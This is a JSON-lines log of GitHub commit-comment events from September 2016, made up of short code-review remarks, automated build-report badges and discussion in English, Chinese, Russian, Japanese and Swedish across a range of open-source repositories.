{"id":"4587689798","type":"CommitCommentEvent","actor":{"login":"psycofdj"},"repo":{"name":"psycofdj/xtdcpp"},"payload":{"comment":{"id":19091169,"position":null,"line":null,"path":null,"commit_id":"2accdb1da3f7b7a266d2f014cb60171a6924a7fe","created_at":"2016-09-20T06:17:47Z","updated_at":"2016-09-20T06:17:47Z","body":"\nBuild report #161240374 for sha 2accdb1da3f7b7a266d2f014cb60171a6924a7fe:\n\n[![UnitTests](https://img.shields.io/badge/unittests-passed%20%283/3%29%20-brightgreen.svg)](#)\n[![Coverage](https://img.shields.io/badge/coverage-14.07%20%25-yellow.svg)](#)\n[![Cppcheck](https://img.shields.io/badge/cppcheck-0%20error%28s%29-brightgreen.svg)](#)\n[![Code statistics](https://img.shields.io/badge/cloc-2391%20/%209922%20%2824.10%20%25%29-yellow.svg)](#)\n[![Documentation](https://img.shields.io/badge/doc-success-brightgreen.svg)](#)\n[![Documentation coverage](https://img.shields.io/badge/doc--coverage-19.75%20%25-yellow.svg)](#)\n\n\n[Reports](https://psycofdj.github.io/xtdcpp/master/)\n      "}},"created_at":"2016-09-20T06:17:47Z"}
{"id":"4587691717","type":"CommitCommentEvent","actor":{"login":"TiagoCardoso1983"},"repo":{"name":"jeremyevans/rodauth"},"payload":{"comment":{"id":19091172,"position":13,"line":11,"path":"CHANGELOG","commit_id":"2101cfc1b50ba60956feb77b2512ee1010585419","created_at":"2016-09-20T06:18:24Z","updated_at":"2016-09-20T06:18:24Z","body":"I think that one should not mix the content type of a request/response with its authentication strategy, as I've worked in AngularJS apps which were cookie-authenticated and communicated with REST APIs. If I remember correctly, and going back to github's example, they let you authenticate with cookie, token or basic auth to their JSON API. So I'd not assume an empty session in json mode.\r\n\r\nWhat I think makes sense: with `jwt` enabled, check if authorization header is set; if so, use it; if not, check if there's a session (I can, as user, refrain from using the rack session) and perform the standard strategy. \r\n\r\nI will be testing again your latest commit and if any issues arise, will be recommenting in the issue. "}},"created_at":"2016-09-20T06:18:24Z"}
{"id":"4587693119","type":"CommitCommentEvent","actor":{"login":"psycofdj"},"repo":{"name":"psycofdj/xtdcpp"},"payload":{"comment":{"id":19091174,"position":null,"line":null,"path":null,"commit_id":"fd28f399fe15f238854700b19975a8025de5fb4e","created_at":"2016-09-20T06:18:53Z","updated_at":"2016-09-20T06:18:53Z","body":"\nBuild report #161240509 for sha fd28f399fe15f238854700b19975a8025de5fb4e:\n\n[![UnitTests](https://img.shields.io/badge/unittests-passed%20%280/0%29%20-brightgreen.svg)](#)\n[![Coverage](https://img.shields.io/badge/coverage-0.00%20%25-yellow.svg)](#)\n[![Cppcheck](https://img.shields.io/badge/cppcheck-0%20error%28s%29-brightgreen.svg)](#)\n[![Code statistics](https://img.shields.io/badge/cloc-0%20/%200%20%280.00%20%25%29-yellow.svg)](#)\n[![Documentation](https://img.shields.io/badge/doc-success-brightgreen.svg)](#)\n[![Documentation coverage](https://img.shields.io/badge/doc--coverage-0.00%20%25-yellow.svg)](#)\n\n\n[Reports](https://psycofdj.github.io/xtdcpp/feature/unitests/)\n      "}},"created_at":"2016-09-20T06:18:53Z"}
{"id":"4587695493","type":"CommitCommentEvent","actor":{"login":"psycofdj"},"repo":{"name":"psycofdj/xtdcpp"},"payload":{"comment":{"id":19091181,"position":null,"line":null,"path":null,"commit_id":"fd28f399fe15f238854700b19975a8025de5fb4e","created_at":"2016-09-20T06:19:42Z","updated_at":"2016-09-20T06:19:42Z","body":"\nBuild report #161240600 for sha fd28f399fe15f238854700b19975a8025de5fb4e:\n\n[![UnitTests](https://img.shields.io/badge/unittests-passed%20%280/0%29%20-brightgreen.svg)](#)\n[![Coverage](https://img.shields.io/badge/coverage-0.00%20%25-yellow.svg)](#)\n[![Cppcheck](https://img.shields.io/badge/cppcheck-0%20error%28s%29-brightgreen.svg)](#)\n[![Code statistics](https://img.shields.io/badge/cloc-0%20/%200%20%280.00%20%25%29-yellow.svg)](#)\n[![Documentation](https://img.shields.io/badge/doc-success-brightgreen.svg)](#)\n[![Documentation coverage](https://img.shields.io/badge/doc--coverage-0.00%20%25-yellow.svg)](#)\n\n\n[Reports](https://psycofdj.github.io/xtdcpp/master/)\n      "}},"created_at":"2016-09-20T06:19:42Z"}
{"id":"4587695527","type":"CommitCommentEvent","actor":{"login":"dvigneshwer"},"repo":{"name":"FoxIOT/studyGroup"},"payload":{"comment":{"id":19091182,"position":null,"line":null,"path":null,"commit_id":"4a86664f41ba57c8d3e4022bbdf11140071372d5","created_at":"2016-09-20T06:19:43Z","updated_at":"2016-09-20T06:19:43Z","body":"Ohh I didn't see this. Need to test it out, will do it during the meetup."}},"created_at":"2016-09-20T06:19:43Z"}
{"id":"4587701842","type":"CommitCommentEvent","actor":{"login":"janis91"},"repo":{"name":"janis91/nextnotes"},"payload":{"comment":{"id":19091190,"position":null,"line":null,"path":null,"commit_id":"03d0ead400d3ffe4f3ab21a914cb3236d649f097","created_at":"2016-09-20T06:21:46Z","updated_at":"2016-09-20T06:21:46Z","body":"#29 "}},"created_at":"2016-09-20T06:21:46Z"}
{"id":"4587703032","type":"CommitCommentEvent","actor":{"login":"QxQstar"},"repo":{"name":"QxQstar/reactPractice"},"payload":{"comment":{"id":19091192,"position":null,"line":null,"path":null,"commit_id":"e9624750887205c6ac2731b904f370d55e081877","created_at":"2016-09-20T06:22:08Z","updated_at":"2016-09-20T06:22:08Z","body":"开发源码保存在build/navBar文件夹中，创建之后的代码保存在dist/navBar文件文件夹中"}},"created_at":"2016-09-20T06:22:08Z"}
{"id":"4587703813","type":"CommitCommentEvent","actor":{"login":"janis91"},"repo":{"name":"janis91/nextnotes"},"payload":{"comment":{"id":19091193,"position":null,"line":null,"path":null,"commit_id":"9744cee72b0d9af92914bc3443cb0539ea9166a0","created_at":"2016-09-20T06:22:19Z","updated_at":"2016-09-20T06:22:19Z","body":"#29 "}},"created_at":"2016-09-20T06:22:19Z"}
{"id":"4587705110","type":"CommitCommentEvent","actor":{"login":"ColinHarrington"},"repo":{"name":"ColinHarrington/grails-core"},"payload":{"comment":{"id":19091197,"position":null,"line":null,"path":null,"commit_id":"350551a9c5b77bcca737470f6209a23da9b8f99f","created_at":"2016-09-20T06:22:46Z","updated_at":"2016-09-20T06:22:46Z","body":"This is a very localized approach, I think there is a better solution."}},"created_at":"2016-09-20T06:22:46Z"}
{"id":"4587712625","type":"CommitCommentEvent","actor":{"login":"MagoKimbra"},"repo":{"name":"MarlinFirmware/Marlin"},"payload":{"comment":{"id":19091209,"position":null,"line":null,"path":null,"commit_id":"9a9e9afcf81a6eb7b7515df41bc2a1b099f8b849","created_at":"2016-09-20T06:25:10Z","updated_at":"2016-09-20T06:25:10Z","body":"I have a first versions of BLTOUCH, so it might not be a good test.\r\nIf the locking pin out of the hand, begins to flash indicating the error, but I always read 90."}},"created_at":"2016-09-20T06:25:10Z"}
{"id":"4587716910","type":"CommitCommentEvent","actor":{"login":"mydongistiny"},"repo":{"name":"LiquidNougat/external_guava"},"payload":{"comment":{"id":19091220,"position":null,"line":null,"path":null,"commit_id":"a4cfa0aba80f49f80b5bd04947d5b672721d6229","created_at":"2016-09-20T06:26:34Z","updated_at":"2016-09-20T06:26:34Z","body":"I see you're back to picking everything I push again. Can't say I'm surprised though. You just gonna pick everything again, change the name and say \"look at what I did\"."}},"created_at":"2016-09-20T06:26:34Z"}
{"id":"4587721436","type":"CommitCommentEvent","actor":{"login":"KanjariyaHardik"},"repo":{"name":"charusat09/kms"},"payload":{"comment":{"id":19091236,"position":1,"line":1,"path":".ruby-gemset","commit_id":"97a14d33ad648dc9f5454630534b4930fbbe51af","created_at":"2016-09-20T06:28:04Z","updated_at":"2016-09-20T06:28:04Z","body":"File should be ended with a blank line, This will helpful for code sageration"}},"created_at":"2016-09-20T06:28:04Z"}
{"id":"4587721930","type":"CommitCommentEvent","actor":{"login":"KanjariyaHardik"},"repo":{"name":"charusat09/kms"},"payload":{"comment":{"id":19091238,"position":1,"line":1,"path":".ruby-version","commit_id":"97a14d33ad648dc9f5454630534b4930fbbe51af","created_at":"2016-09-20T06:28:15Z","updated_at":"2016-09-20T06:28:15Z","body":"File should be ended with a blank line, This will helpful for code sageration"}},"created_at":"2016-09-20T06:28:15Z"}
{"id":"4587723842","type":"CommitCommentEvent","actor":{"login":"mainej"},"repo":{"name":"Mayvenn/storefront"},"payload":{"comment":{"id":19091246,"position":8,"line":18,"path":"src-cljc/storefront/app_routes.cljc","commit_id":"76734451d5c6d4856d102fe992e5d45a6aa6305b","created_at":"2016-09-20T06:28:54Z","updated_at":"2016-09-20T06:28:54Z","body":"This is an important commit, but it broke the Privacy page.  `api/get-static-content` tries to fetch `/static/privacy`, not `/static/policy/privacy`, so we get a 404."}},"created_at":"2016-09-20T06:28:54Z"}
{"id":"4587723915","type":"CommitCommentEvent","actor":{"login":"positron96"},"repo":{"name":"intel-iot-devkit/upm"},"payload":{"comment":{"id":19091248,"position":null,"line":null,"path":null,"commit_id":"e679d40d44bd5fb4c71f8567bfe9ceb7f45c75c7","created_at":"2016-09-20T06:28:56Z","updated_at":"2016-09-20T06:28:56Z","body":"Hey there! Could you add a comment in the example on how to wire the DS18B20 to edison?"}},"created_at":"2016-09-20T06:28:56Z"}
{"id":"4587724192","type":"CommitCommentEvent","actor":{"login":"mainej"},"repo":{"name":"Mayvenn/storefront"},"payload":{"comment":{"id":19091249,"position":9,"line":19,"path":"src-cljc/storefront/app_routes.cljc","commit_id":"76734451d5c6d4856d102fe992e5d45a6aa6305b","created_at":"2016-09-20T06:29:02Z","updated_at":"2016-09-20T06:29:02Z","body":"Same for TOS"}},"created_at":"2016-09-20T06:29:02Z"}
{"id":"4587725695","type":"CommitCommentEvent","actor":{"login":"Anakinliu"},"repo":{"name":"Anakinliu/Anakinliu.github.io"},"payload":{"comment":{"id":19091255,"position":null,"line":null,"path":null,"commit_id":"bbc1fbada72582ae8db83bedf083ca86a2be5c1b","created_at":"2016-09-20T06:29:33Z","updated_at":"2016-09-20T06:29:33Z","body":" new"}},"created_at":"2016-09-20T06:29:33Z"}
{"id":"4587726189","type":"CommitCommentEvent","actor":{"login":"dmitryshurshilin"},"repo":{"name":"OsipovDenis/frontend-video-angular"},"payload":{"comment":{"id":19091258,"position":43,"line":62,"path":"client/addItem/views/addItem.tpl.html","commit_id":"73fdb4bf3ce5b5c729467281ec013a878e79300a","created_at":"2016-09-20T06:29:43Z","updated_at":"2016-09-20T06:29:43Z","body":"track by"}},"created_at":"2016-09-20T06:29:43Z"}
{"id":"4587727720","type":"CommitCommentEvent","actor":{"login":"dmitryshurshilin"},"repo":{"name":"OsipovDenis/frontend-video-angular"},"payload":{"comment":{"id":19091266,"position":33,"line":36,"path":"client/app.js","commit_id":"73fdb4bf3ce5b5c729467281ec013a878e79300a","created_at":"2016-09-20T06:30:14Z","updated_at":"2016-09-20T06:30:14Z","body":"!=="}},"created_at":"2016-09-20T06:30:14Z"}
{"id":"4587729719","type":"CommitCommentEvent","actor":{"login":"iffyuva"},"repo":{"name":"code-mancers/picks"},"payload":{"comment":{"id":19091272,"position":1,"line":1,"path":"2016-09-20.md","commit_id":"2a73ce06aa5174cac16382d980e802cf7b5094d0","created_at":"2016-09-20T06:30:49Z","updated_at":"2016-09-20T06:30:49Z","body":"nice one :)"}},"created_at":"2016-09-20T06:30:49Z"}
{"id":"4587730026","type":"CommitCommentEvent","actor":{"login":"KanjariyaHardik"},"repo":{"name":"charusat09/kms"},"payload":{"comment":{"id":19091273,"position":4,"line":2,"path":"app/models/article.rb","commit_id":"b1bb38b3888f283ef960533906397f950775aa40","created_at":"2016-09-20T06:30:55Z","updated_at":"2016-09-20T06:30:55Z","body":"Tab Indentation should of 2 space"}},"created_at":"2016-09-20T06:30:55Z"}
{"id":"4587730617","type":"CommitCommentEvent","actor":{"login":"KanjariyaHardik"},"repo":{"name":"charusat09/kms"},"payload":{"comment":{"id":19091275,"position":2,"line":2,"path":"app/models/category.rb","commit_id":"b1bb38b3888f283ef960533906397f950775aa40","created_at":"2016-09-20T06:31:07Z","updated_at":"2016-09-20T06:31:07Z","body":"Tab Indentation should of 2 space"}},"created_at":"2016-09-20T06:31:07Z"}
{"id":"4587731155","type":"CommitCommentEvent","actor":{"login":"KanjariyaHardik"},"repo":{"name":"charusat09/kms"},"payload":{"comment":{"id":19091277,"position":5,"line":5,"path":"db/migrate/20160919120935_create_pictures.rb","commit_id":"b1bb38b3888f283ef960533906397f950775aa40","created_at":"2016-09-20T06:31:16Z","updated_at":"2016-09-20T06:31:16Z","body":"Tab Indentation should of 2 space"}},"created_at":"2016-09-20T06:31:16Z"}
{"id":"4587731548","type":"CommitCommentEvent","actor":{"login":"dmitryshurshilin"},"repo":{"name":"OsipovDenis/frontend-video-angular"},"payload":{"comment":{"id":19091278,"position":29,"line":28,"path":"client/editItem/views/editItem.tpl.html","commit_id":"73fdb4bf3ce5b5c729467281ec013a878e79300a","created_at":"2016-09-20T06:31:23Z","updated_at":"2016-09-20T06:31:23Z","body":"Зачем пробелы вокруг равно?\r\n`<label class=\"label-text\" for=\"link\">`"}},"created_at":"2016-09-20T06:31:23Z"}
{"id":"4587732229","type":"CommitCommentEvent","actor":{"login":"KanjariyaHardik"},"repo":{"name":"charusat09/kms"},"payload":{"comment":{"id":19091281,"position":3,"line":3,"path":"db/migrate/20160919123518_articles_categories.rb","commit_id":"b1bb38b3888f283ef960533906397f950775aa40","created_at":"2016-09-20T06:31:35Z","updated_at":"2016-09-20T06:31:35Z","body":"Extra space in first indent"}},"created_at":"2016-09-20T06:31:35Z"}
{"id":"4587732493","type":"CommitCommentEvent","actor":{"login":"psycofdj"},"repo":{"name":"psycofdj/xtdcpp"},"payload":{"comment":{"id":19091282,"position":null,"line":null,"path":null,"commit_id":"def6044db4da4a4b66305d77c1241bdcf14c2128","created_at":"2016-09-20T06:31:39Z","updated_at":"2016-09-20T06:31:39Z","body":"\nBuild report #161241675 for sha def6044db4da4a4b66305d77c1241bdcf14c2128:\n\n[![UnitTests](https://img.shields.io/badge/unittests-passed%20%283/3%29%20-brightgreen.svg)](#)\n[![Coverage](https://img.shields.io/badge/coverage-14.07%20%25-yellow.svg)](#)\n[![Cppcheck](https://img.shields.io/badge/cppcheck-0%20error%28s%29-brightgreen.svg)](#)\n[![Code statistics](https://img.shields.io/badge/cloc-2391%20/%209922%20%2824.10%20%25%29-yellow.svg)](#)\n[![Documentation](https://img.shields.io/badge/doc-success-brightgreen.svg)](#)\n[![Documentation coverage](https://img.shields.io/badge/doc--coverage-19.75%20%25-yellow.svg)](#)\n\n\n[Reports](https://psycofdj.github.io/xtdcpp/feature/unitests/)\n      "}},"created_at":"2016-09-20T06:31:39Z"}
{"id":"4587732613","type":"CommitCommentEvent","actor":{"login":"psycofdj"},"repo":{"name":"psycofdj/xtdcpp"},"payload":{"comment":{"id":19091283,"position":null,"line":null,"path":null,"commit_id":"def6044db4da4a4b66305d77c1241bdcf14c2128","created_at":"2016-09-20T06:31:41Z","updated_at":"2016-09-20T06:31:41Z","body":"\nBuild report #161241680 for sha def6044db4da4a4b66305d77c1241bdcf14c2128:\n\n[![UnitTests](https://img.shields.io/badge/unittests-passed%20%283/3%29%20-brightgreen.svg)](#)\n[![Coverage](https://img.shields.io/badge/coverage-14.07%20%25-yellow.svg)](#)\n[![Cppcheck](https://img.shields.io/badge/cppcheck-0%20error%28s%29-brightgreen.svg)](#)\n[![Code statistics](https://img.shields.io/badge/cloc-2391%20/%209922%20%2824.10%20%25%29-yellow.svg)](#)\n[![Documentation](https://img.shields.io/badge/doc-success-brightgreen.svg)](#)\n[![Documentation coverage](https://img.shields.io/badge/doc--coverage-19.75%20%25-yellow.svg)](#)\n\n\n[Reports](https://psycofdj.github.io/xtdcpp/master/)\n      "}},"created_at":"2016-09-20T06:31:41Z"}
{"id":"4587733432","type":"CommitCommentEvent","actor":{"login":"nlharris"},"repo":{"name":"kbaseapps/FeatureValues"},"payload":{"comment":{"id":19091286,"position":5,"line":4,"path":"ui/narrative/methods/build_feature_set/display.yaml","commit_id":"3a3832b5e037a4e2351238b82addf15ec9fd393e","created_at":"2016-09-20T06:31:57Z","updated_at":"2016-09-20T06:31:57Z","body":"Please change to \"Build Feature Set from Genome\", as requested in https://atlassian.kbase.us/browse/KBASE-4534"}},"created_at":"2016-09-20T06:31:57Z"}
{"id":"4587733884","type":"CommitCommentEvent","actor":{"login":"KanjariyaHardik"},"repo":{"name":"charusat09/kms"},"payload":{"comment":{"id":19091289,"position":2,"line":2,"path":"app/models/picture.rb","commit_id":"1a9ef429143aa740a1c198608be1c9ea1932396b","created_at":"2016-09-20T06:32:08Z","updated_at":"2016-09-20T06:32:08Z","body":"Tab Indentation should of 2 space"}},"created_at":"2016-09-20T06:32:08Z"}
{"id":"4587735454","type":"CommitCommentEvent","actor":{"login":"tobli"},"repo":{"name":"sitespeedio/browsertime"},"payload":{"comment":{"id":19091297,"position":null,"line":null,"path":null,"commit_id":"0e07d8ca1d2c17ce09432f8ec016d5b572c3eba9","created_at":"2016-09-20T06:32:35Z","updated_at":"2016-09-20T06:32:35Z","body":"Agreed. Let's do that next."}},"created_at":"2016-09-20T06:32:35Z"}
{"id":"4587736213","type":"CommitCommentEvent","actor":{"login":"donaldpipowitch"},"repo":{"name":"webpack/webpack"},"payload":{"comment":{"id":19091299,"position":null,"line":null,"path":null,"commit_id":"40a67f632ce17746fa8646a10fa6e06e54eea538","created_at":"2016-09-20T06:32:50Z","updated_at":"2016-09-20T06:32:50Z","body":"@sokra Thank you so much for adding JSON Schema to validate the configuration. This just told me that my config is invalid. Really helpful. Would you accept a pull request for including TypeScript types as well?"}},"created_at":"2016-09-20T06:32:50Z"}
{"id":"4587737226","type":"CommitCommentEvent","actor":{"login":"nlharris"},"repo":{"name":"kbaseapps/FeatureValues"},"payload":{"comment":{"id":19091300,"position":53,"line":76,"path":"ui/narrative/methods/build_feature_set/display.yaml","commit_id":"3a3832b5e037a4e2351238b82addf15ec9fd393e","created_at":"2016-09-20T06:33:09Z","updated_at":"2016-09-20T06:33:09Z","body":"shareable, not sharable.\r\nAnd I don't understand why the fact that Feature Sets are shareable would allow you to comment on specific features in your Narrative."}},"created_at":"2016-09-20T06:33:09Z"}
{"id":"4587737539","type":"CommitCommentEvent","actor":{"login":"apeters"},"repo":{"name":"archesproject/arches"},"payload":{"comment":{"id":19091301,"position":null,"line":null,"path":null,"commit_id":"65b97e92211cbf54c61153ae76c5a465c041d558","created_at":"2016-09-20T06:33:16Z","updated_at":"2016-09-20T06:33:16Z","body":"re #769"}},"created_at":"2016-09-20T06:33:16Z"}
{"id":"4587737867","type":"CommitCommentEvent","actor":{"login":"KanjariyaHardik"},"repo":{"name":"charusat09/kms"},"payload":{"comment":{"id":19091302,"position":6,"line":18,"path":"app/assets/stylesheets/application.css","commit_id":"560fa2884cc953e251174d973faff398fe7cdb01","created_at":"2016-09-20T06:33:23Z","updated_at":"2016-09-20T06:33:23Z","body":"File should be ended with a blank line, This will helpful for code sageration"}},"created_at":"2016-09-20T06:33:23Z"}
{"id":"4587738008","type":"CommitCommentEvent","actor":{"login":"kachick"},"repo":{"name":"circleci/rspec_junit_formatter"},"payload":{"comment":{"id":19091303,"position":null,"line":null,"path":null,"commit_id":"6885218137afbadf560c922114767866953f8cbf","created_at":"2016-09-20T06:33:25Z","updated_at":"2016-09-20T06:33:25Z","body":"👍 "}},"created_at":"2016-09-20T06:33:25Z"}
{"id":"4587738512","type":"CommitCommentEvent","actor":{"login":"KanjariyaHardik"},"repo":{"name":"charusat09/kms"},"payload":{"comment":{"id":19091305,"position":6,"line":6,"path":"app/views/home/index.html.erb","commit_id":"560fa2884cc953e251174d973faff398fe7cdb01","created_at":"2016-09-20T06:33:36Z","updated_at":"2016-09-20T06:33:36Z","body":"File should be ended with a blank line, This will helpful for code sageration"}},"created_at":"2016-09-20T06:33:36Z"}
{"id":"4587739111","type":"CommitCommentEvent","actor":{"login":"sheng00125"},"repo":{"name":"sheng00125/opencv"},"payload":{"comment":{"id":19091310,"position":null,"line":null,"path":null,"commit_id":"e87b8599f0feeec7c61c60efda43171da7bb44cb","created_at":"2016-09-20T06:33:47Z","updated_at":"2016-09-20T06:33:47Z","body":"主要是关于OpenCV的学习例子的程序"}},"created_at":"2016-09-20T06:33:47Z"}
{"id":"4587739526","type":"CommitCommentEvent","actor":{"login":"nlharris"},"repo":{"name":"kbaseapps/FeatureValues"},"payload":{"comment":{"id":19091313,"position":52,"line":75,"path":"ui/narrative/methods/build_feature_set/display.yaml","commit_id":"3a3832b5e037a4e2351238b82addf15ec9fd393e","created_at":"2016-09-20T06:33:55Z","updated_at":"2016-09-20T06:33:55Z","body":"Aren't we calling everything \"Apps\" now, not \"methods\"?"}},"created_at":"2016-09-20T06:33:55Z"}
{"id":"4587740688","type":"CommitCommentEvent","actor":{"login":"EveryGoodNameIsTaken"},"repo":{"name":"EveryGoodNameIsTaken/dynobot"},"payload":{"comment":{"id":19091317,"position":null,"line":null,"path":null,"commit_id":"e36055578c65cfe5ec25ed0f91ff5161dd6637cc","created_at":"2016-09-20T06:34:19Z","updated_at":"2016-09-20T06:34:19Z","body":"Current working build."}},"created_at":"2016-09-20T06:34:19Z"}
{"id":"4587740734","type":"CommitCommentEvent","actor":{"login":"KanjariyaHardik"},"repo":{"name":"charusat09/kms"},"payload":{"comment":{"id":19091318,"position":6,"line":18,"path":"app/assets/stylesheets/application.css","commit_id":"878104c1818b2cce67a38e7026621a0665744934","created_at":"2016-09-20T06:34:20Z","updated_at":"2016-09-20T06:34:20Z","body":"File should be ended with a blank line, This will helpful for code sageration"}},"created_at":"2016-09-20T06:34:20Z"}
{"id":"4587744231","type":"CommitCommentEvent","actor":{"login":"soulgalore"},"repo":{"name":"sitespeedio/browsertime"},"payload":{"comment":{"id":19091331,"position":null,"line":null,"path":null,"commit_id":"0e07d8ca1d2c17ce09432f8ec016d5b572c3eba9","created_at":"2016-09-20T06:35:27Z","updated_at":"2016-09-20T06:35:27Z","body":"Lets see, maybe we can fix the big thig before 4.0, then this is a non issue."}},"created_at":"2016-09-20T06:35:27Z"}
{"id":"4587745679","type":"CommitCommentEvent","actor":{"login":"dmitryshurshilin"},"repo":{"name":"OsipovDenis/frontend-video-angular"},"payload":{"comment":{"id":19091337,"position":67,"line":67,"path":"client/editItem/views/editItem.tpl.html","commit_id":"73fdb4bf3ce5b5c729467281ec013a878e79300a","created_at":"2016-09-20T06:35:56Z","updated_at":"2016-09-20T06:35:56Z","body":"Вижу for=\"duration\" у label, но не вижу элемента с id=\"duration\".\r\nАналогично в других местах."}},"created_at":"2016-09-20T06:35:56Z"}
{"id":"4587751288","type":"CommitCommentEvent","actor":{"login":"littlesat"},"repo":{"name":"Taapat/enigma2-openpli-vuplus"},"payload":{"comment":{"id":19091353,"position":null,"line":null,"path":null,"commit_id":"a0c5b79f765b9c8314024d55ca9910e3e981959b","created_at":"2016-09-20T06:37:40Z","updated_at":"2016-09-20T06:37:40Z","body":"Isn't it really in fact vollumeToggleUnmute???"}},"created_at":"2016-09-20T06:37:40Z"}
{"id":"4587752950","type":"CommitCommentEvent","actor":{"login":"testcc1"},"repo":{"name":"testcc1/Github_repo"},"payload":{"comment":{"id":19091357,"position":null,"line":null,"path":null,"commit_id":"c4955183da1b6a687f16cb58aea2f62969e39a3d","created_at":"2016-09-20T06:38:12Z","updated_at":"2016-09-20T06:38:12Z","body":"Collaborator:\nA review for this commit was created. [Link to review](http://127.0.0.1:8080/ui#review:id=46)"}},"created_at":"2016-09-20T06:38:12Z"}
{"id":"4587758305","type":"CommitCommentEvent","actor":{"login":"dmitryshurshilin"},"repo":{"name":"OsipovDenis/frontend-video-angular"},"payload":{"comment":{"id":19091368,"position":81,"line":84,"path":"client/editItem/views/editItem.tpl.html","commit_id":"73fdb4bf3ce5b5c729467281ec013a878e79300a","created_at":"2016-09-20T06:39:42Z","updated_at":"2016-09-20T06:39:42Z","body":"Форму сабмитить правильнее по ng-submit"}},"created_at":"2016-09-20T06:39:42Z"}
{"id":"4587761172","type":"CommitCommentEvent","actor":{"login":"chadawagner"},"repo":{"name":"orsjb/beads"},"payload":{"comment":{"id":19091375,"position":40,"line":40,"path":"src/beads_main/net/beadsproject/beads/ugens/ADSR.java","commit_id":"f174fee8bc49823f0867884a2fd6d19a586f7829","created_at":"2016-09-20T06:40:31Z","updated_at":"2016-09-20T06:40:31Z","body":"should this be `env.addSegment(adsr[i], adsr[i+1]);` ??"}},"created_at":"2016-09-20T06:40:31Z"}
{"id":"4587762224","type":"CommitCommentEvent","actor":{"login":"psycofdj"},"repo":{"name":"psycofdj/xtdcpp"},"payload":{"comment":{"id":19091379,"position":null,"line":null,"path":null,"commit_id":"def6044db4da4a4b66305d77c1241bdcf14c2128","created_at":"2016-09-20T06:40:43Z","updated_at":"2016-09-20T06:40:43Z","body":"\nBuild report #161241680 for sha def6044db4da4a4b66305d77c1241bdcf14c2128:\n\n[![UnitTests](https://img.shields.io/badge/unittests-passed%20%283/3%29%20-brightgreen.svg)](#)\n[![Coverage](https://img.shields.io/badge/coverage-14.07%20%25-yellow.svg)](#)\n[![Cppcheck](https://img.shields.io/badge/cppcheck-0%20error%28s%29-brightgreen.svg)](#)\n[![Code statistics](https://img.shields.io/badge/cloc-2391%20/%209922%20%2824.10%20%25%29-yellow.svg)](#)\n[![Documentation](https://img.shields.io/badge/doc-success-brightgreen.svg)](#)\n[![Documentation coverage](https://img.shields.io/badge/doc--coverage-19.75%20%25-yellow.svg)](#)\n\n\n[Reports](https://psycofdj.github.io/xtdcpp/master/)\n      "}},"created_at":"2016-09-20T06:40:43Z"}
{"id":"4587762681","type":"CommitCommentEvent","actor":{"login":"itpastorn"},"repo":{"name":"awe98/prog1-lektioner"},"payload":{"comment":{"id":19091381,"position":null,"line":null,"path":null,"commit_id":"acb3a161484d9a967228683dc8909899605cb7f6","created_at":"2016-09-20T06:40:50Z","updated_at":"2016-09-20T06:40:50Z","body":"Gör beskrivningen lite utförligare"}},"created_at":"2016-09-20T06:40:50Z"}
{"id":"4587769965","type":"CommitCommentEvent","actor":{"login":"dmitryshurshilin"},"repo":{"name":"OsipovDenis/frontend-video-angular"},"payload":{"comment":{"id":19091392,"position":2,"line":8,"path":"client/login/loginService.js","commit_id":"5d49408ed7d81ce90521fb000e05471b88ba9d6f","created_at":"2016-09-20T06:43:06Z","updated_at":"2016-09-20T06:43:06Z","body":"==="}},"created_at":"2016-09-20T06:43:06Z"}
{"id":"4587771766","type":"CommitCommentEvent","actor":{"login":"ZJsnowman"},"repo":{"name":"ZJsnowman/Writing"},"payload":{"comment":{"id":19091396,"position":null,"line":null,"path":null,"commit_id":"b1c8f55864b57367f939d18f0e40e47e2e4bb710","created_at":"2016-09-20T06:43:40Z","updated_at":"2016-09-20T06:43:40Z","body":"#1 It's a good job"}},"created_at":"2016-09-20T06:43:40Z"}
{"id":"4587772881","type":"CommitCommentEvent","actor":{"login":"dmitryshurshilin"},"repo":{"name":"OsipovDenis/frontend-video-angular"},"payload":{"comment":{"id":19091398,"position":16,"line":5,"path":"client/login/views/login.tpl.html","commit_id":"5d49408ed7d81ce90521fb000e05471b88ba9d6f","created_at":"2016-09-20T06:43:59Z","updated_at":"2016-09-20T06:43:59Z","body":"В тег `a` несемантично класть блоковые элементы."}},"created_at":"2016-09-20T06:43:59Z"}
{"id":"4587777909","type":"CommitCommentEvent","actor":{"login":"shinpeimuraoka"},"repo":{"name":"osrg/ryu"},"payload":{"comment":{"id":19091402,"position":null,"line":null,"path":null,"commit_id":"425638d759b089d09cb12d818805edd61f70d1c9","created_at":"2016-09-20T06:45:28Z","updated_at":"2016-09-20T06:45:28Z","body":"重箱の隅をつつきますが、\r\n以下の文にある`configration`は綴りが間違っています。\r\n正しくは`configuration`ではないかとと思います。\r\n\r\n```\r\nThis patch fixes to retrieve the neighbor info from the neighbor\r\nconfigration info of Peer class and fixes this problem.\r\n```"}},"created_at":"2016-09-20T06:45:28Z"}
{"id":"4587785440","type":"CommitCommentEvent","actor":{"login":"nathanathan"},"repo":{"name":"ecohealthalliance/pubcrawler"},"payload":{"comment":{"id":19091415,"position":21,"line":19,"path":"iterate_infectious_disease_articles.py","commit_id":"f41a188bc3faab58687356266530892f6da6d562","created_at":"2016-09-20T06:47:44Z","updated_at":"2016-09-20T06:47:44Z","body":"Moving this here puts it out of scope for the resolve_keyword function."}},"created_at":"2016-09-20T06:47:44Z"}
{"id":"4587788454","type":"CommitCommentEvent","actor":{"login":"dmitryshurshilin"},"repo":{"name":"OsipovDenis/frontend-video-angular"},"payload":{"comment":{"id":19091418,"position":2,"line":2,"path":"client/header/views/header.tpl.html","commit_id":"73fdb4bf3ce5b5c729467281ec013a878e79300a","created_at":"2016-09-20T06:48:38Z","updated_at":"2016-09-20T06:48:38Z","body":"Закрывающий тег потерялся"}},"created_at":"2016-09-20T06:48:38Z"}
{"id":"4587792917","type":"CommitCommentEvent","actor":{"login":"shinpeimuraoka"},"repo":{"name":"osrg/ryu"},"payload":{"comment":{"id":19091423,"position":1,"line":1,"path":"ryu/app/rest_vtep.py","commit_id":"fd389b2a52d245cd02426e39608ef0b73b879fd0","created_at":"2016-09-20T06:49:58Z","updated_at":"2016-09-20T06:49:58Z","body":"西暦が2011年になっています。\r\n2016年ではないでしょうか。"}},"created_at":"2016-09-20T06:49:58Z"}
